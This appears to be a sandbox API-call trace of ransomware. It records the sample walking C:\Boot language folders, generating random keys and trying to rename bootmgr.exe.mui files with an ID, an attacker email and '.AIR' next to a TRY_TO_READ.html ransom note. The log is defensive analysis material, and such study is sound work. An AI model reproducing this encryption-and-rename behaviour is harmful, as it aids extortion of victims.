RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e468 [0116.617] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x34) returned 0x35da18 [0116.617] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x35da18 | out: hHeap=0x2e0000) returned 1 [0116.617] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10) returned 0x340f60 [0116.617] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x340f60 | out: hHeap=0x2e0000) returned 1 [0116.617] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e468 | out: hHeap=0x2e0000) returned 1 [0116.617] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344618 | out: hHeap=0x2e0000) returned 1 [0116.617] FindNextFileW (in: hFindFile=0x35d9d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0116.617] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.617] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.618] GetLastError () returned 0x6 [0116.618] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e468 [0116.618] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344618 [0116.618] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3241b8 [0116.618] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3241b8 | out: hHeap=0x2e0000) returned 1 [0116.618] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344618 | out: hHeap=0x2e0000) returned 1 [0116.618] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e468 | out: hHeap=0x2e0000) returned 1 [0116.618] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3241b8 [0116.618] FindNextFileW (in: hFindFile=0x35d9d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97007b30, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x97007b30, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x97007b30, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0116.618] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.618] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.618] GetLastError () returned 0x6 [0116.618] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344618 [0116.618] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446f8 [0116.618] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324128 [0116.618] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324128 | out: hHeap=0x2e0000) returned 1 [0116.618] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446f8 | out: hHeap=0x2e0000) returned 1 [0116.618] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344618 | out: hHeap=0x2e0000) returned 1 [0116.618] FindNextFileW (in: hFindFile=0x35d9d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97007b30, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x97007b30, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x97007b30, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0116.618] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324128 [0116.618] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x3627c0 [0116.618] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330b88 [0116.618] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x3627c0 | out: pbBuffer=0x3627c0) returned 1 [0116.618] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x330b88 | out: pbBuffer=0x330b88) returned 1 [0116.618] SetFileAttributesW (lpFileName="C:\\\\Boot\\nb-NO\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0116.618] lstrlenW (lpString="C:\\\\Boot\\nb-NO\\bootmgr.exe.mui") returned 30 [0116.618] GetProcessHeap () returned 0x2e0000 [0116.618] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa2) returned 0x344ca0 [0116.618] lstrcpyW (in: lpString1=0x344ca0, lpString2="C:\\\\Boot\\nb-NO\\bootmgr.exe.mui" | out: lpString1="C:\\\\Boot\\nb-NO\\bootmgr.exe.mui") returned="C:\\\\Boot\\nb-NO\\bootmgr.exe.mui" [0116.618] lstrcatW (in: lpString1="C:\\\\Boot\\nb-NO\\bootmgr.exe.mui", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Boot\\nb-NO\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Boot\\nb-NO\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" [0116.619] MoveFileExW (lpExistingFileName="C:\\\\Boot\\nb-NO\\bootmgr.exe.mui" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\nb-NO\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 0 [0116.619] CreateFileW (lpFileName="C:\\\\Boot\\nb-NO\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0116.619] GetProcessHeap () returned 0x2e0000 [0116.619] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344ca0 | out: hHeap=0x2e0000) returned 1 [0116.619] CloseHandle (hObject=0xffffffff) returned 0 [0116.619] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324128 | out: hHeap=0x2e0000) returned 1 [0116.619] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3241b8 | out: hHeap=0x2e0000) returned 1 [0116.619] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344618 [0116.619] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446c0 | out: hHeap=0x2e0000) returned 1 [0116.619] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e4b8 | out: hHeap=0x2e0000) returned 1 [0116.619] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e4e0 | out: hHeap=0x2e0000) returned 1 [0116.619] FindFirstFileW (in: lpFileName="C:\\\\Boot\\nl-NL\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x97007b30, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x97007b30, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x35da18 [0116.619] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.619] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.619] GetLastError () returned 0x6 [0116.619] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446c0 [0116.619] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x4c) returned 0x324bf0 [0116.619] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324bf0 | out: hHeap=0x2e0000) returned 1 [0116.619] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e4b8 [0116.619] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x34) returned 0x35da58 [0116.619] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x35da58 | out: hHeap=0x2e0000) returned 1 [0116.619] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10) returned 0x340f60 [0116.619] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x340f60 | out: hHeap=0x2e0000) returned 1 [0116.619] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e4b8 | out: hHeap=0x2e0000) returned 1 [0116.619] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446c0 | out: hHeap=0x2e0000) returned 1 [0116.620] FindNextFileW (in: hFindFile=0x35da18, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x97007b30, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x97007b30, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0116.620] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.620] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.620] GetLastError () returned 0x6 [0116.620] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446c0 [0116.620] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x4c) returned 0x324bf0 [0116.620] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324bf0 | out: hHeap=0x2e0000) returned 1 [0116.620] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e4b8 [0116.620] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x34) returned 0x35da58 [0116.620] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x35da58 | out: hHeap=0x2e0000) returned 1 [0116.620] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10) returned 0x340f60 [0116.620] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x340f60 | out: hHeap=0x2e0000) returned 1 [0116.620] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e4b8 | out: hHeap=0x2e0000) returned 1 [0116.620] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446c0 | out: hHeap=0x2e0000) returned 1 [0116.620] FindNextFileW (in: hFindFile=0x35da18, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0116.620] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.620] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.620] GetLastError () returned 0x6 [0116.620] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e4b8 [0116.620] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446c0 [0116.620] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3241b8 [0116.620] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3241b8 | out: hHeap=0x2e0000) returned 1 [0116.620] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446c0 | out: hHeap=0x2e0000) returned 1 [0116.620] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e4b8 | out: hHeap=0x2e0000) returned 1 [0116.620] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3241b8 [0116.620] FindNextFileW (in: hFindFile=0x35da18, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97007b30, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x97007b30, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x97007b30, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0116.620] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.620] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.620] GetLastError () returned 0x6 [0116.620] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446c0 [0116.620] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446f8 [0116.620] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324128 [0116.620] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324128 | out: hHeap=0x2e0000) returned 1 [0116.620] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446f8 | out: hHeap=0x2e0000) returned 1 [0116.621] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446c0 | out: hHeap=0x2e0000) returned 1 [0116.621] FindNextFileW (in: hFindFile=0x35da18, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97007b30, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x97007b30, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x97007b30, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0116.621] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324128 [0116.621] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x3628c8 [0116.621] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330b98 [0116.621] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x3628c8 | out: pbBuffer=0x3628c8) returned 1 [0116.621] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x330b98 | out: pbBuffer=0x330b98) returned 1 [0116.621] SetFileAttributesW (lpFileName="C:\\\\Boot\\nl-NL\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0116.621] lstrlenW (lpString="C:\\\\Boot\\nl-NL\\bootmgr.exe.mui") returned 30 [0116.621] GetProcessHeap () returned 0x2e0000 [0116.621] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa2) returned 0x344ca0 [0116.621] lstrcpyW (in: lpString1=0x344ca0, lpString2="C:\\\\Boot\\nl-NL\\bootmgr.exe.mui" | out: lpString1="C:\\\\Boot\\nl-NL\\bootmgr.exe.mui") returned="C:\\\\Boot\\nl-NL\\bootmgr.exe.mui" [0116.621] lstrcatW (in: lpString1="C:\\\\Boot\\nl-NL\\bootmgr.exe.mui", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Boot\\nl-NL\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Boot\\nl-NL\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" [0116.621] MoveFileExW (lpExistingFileName="C:\\\\Boot\\nl-NL\\bootmgr.exe.mui" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\nl-NL\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 0 [0116.621] CreateFileW (lpFileName="C:\\\\Boot\\nl-NL\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0116.621] GetProcessHeap () returned 0x2e0000 [0116.621] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344ca0 | out: hHeap=0x2e0000) returned 1 [0116.621] CloseHandle (hObject=0xffffffff) returned 0 [0116.621] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324128 | out: hHeap=0x2e0000) returned 1 [0116.621] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3241b8 | out: hHeap=0x2e0000) returned 1 [0116.621] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446c0 [0116.621] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344618 | out: hHeap=0x2e0000) returned 1 [0116.621] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e508 | out: hHeap=0x2e0000) returned 1 [0116.621] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e530 | out: hHeap=0x2e0000) returned 1 [0116.621] FindFirstFileW (in: lpFileName="C:\\\\Boot\\pl-PL\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x97007b30, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x97007b30, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x35da58 [0116.622] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.622] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.622] GetLastError () returned 0x6 [0116.622] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344618 [0116.622] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x4c) returned 0x324bf0 [0116.622] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324bf0 | out: hHeap=0x2e0000) returned 1 [0116.622] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e508 [0116.622] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x34) returned 0x35da98 [0116.622] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x35da98 | out: hHeap=0x2e0000) returned 1 [0116.622] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10) returned 0x340f60 [0116.622] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x340f60 | out: hHeap=0x2e0000) returned 1 [0116.622] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e508 | out: hHeap=0x2e0000) returned 1 [0116.622] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344618 | out: hHeap=0x2e0000) returned 1 [0116.622] FindNextFileW (in: hFindFile=0x35da58, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x97007b30, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x97007b30, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0116.622] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.622] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.622] GetLastError () returned 0x6 [0116.622] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344618 [0116.622] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x4c) returned 0x324bf0 [0116.622] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324bf0 | out: hHeap=0x2e0000) returned 1 [0116.622] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e508 [0116.622] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x34) returned 0x35da98 [0116.622] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x35da98 | out: hHeap=0x2e0000) returned 1 [0116.622] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10) returned 0x340f60 [0116.622] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x340f60 | out: hHeap=0x2e0000) returned 1 [0116.622] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e508 | out: hHeap=0x2e0000) returned 1 [0116.622] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344618 | out: hHeap=0x2e0000) returned 1 [0116.622] FindNextFileW (in: hFindFile=0x35da58, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0116.622] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.622] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.622] GetLastError () returned 0x6 [0116.623] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e508 [0116.623] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344618 [0116.623] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3241b8 [0116.623] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3241b8 | out: hHeap=0x2e0000) returned 1 [0116.623] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344618 | out: hHeap=0x2e0000) returned 1 [0116.623] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e508 | out: hHeap=0x2e0000) returned 1 [0116.623] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3241b8 [0116.623] FindNextFileW (in: hFindFile=0x35da58, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97007b30, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x97007b30, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x97007b30, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0116.623] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.623] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.623] GetLastError () returned 0x6 [0116.623] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344618 [0116.623] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446f8 [0116.623] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324128 [0116.623] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324128 | out: hHeap=0x2e0000) returned 1 [0116.623] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446f8 | out: hHeap=0x2e0000) returned 1 [0116.623] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344618 | out: hHeap=0x2e0000) returned 1 [0116.623] FindNextFileW (in: hFindFile=0x35da58, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97007b30, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x97007b30, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x97007b30, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0116.623] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324128 [0116.623] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x3629d0 [0116.623] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330ba8 [0116.623] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x3629d0 | out: pbBuffer=0x3629d0) returned 1 [0116.623] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x330ba8 | out: pbBuffer=0x330ba8) returned 1 [0116.623] SetFileAttributesW (lpFileName="C:\\\\Boot\\pl-PL\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0116.623] lstrlenW 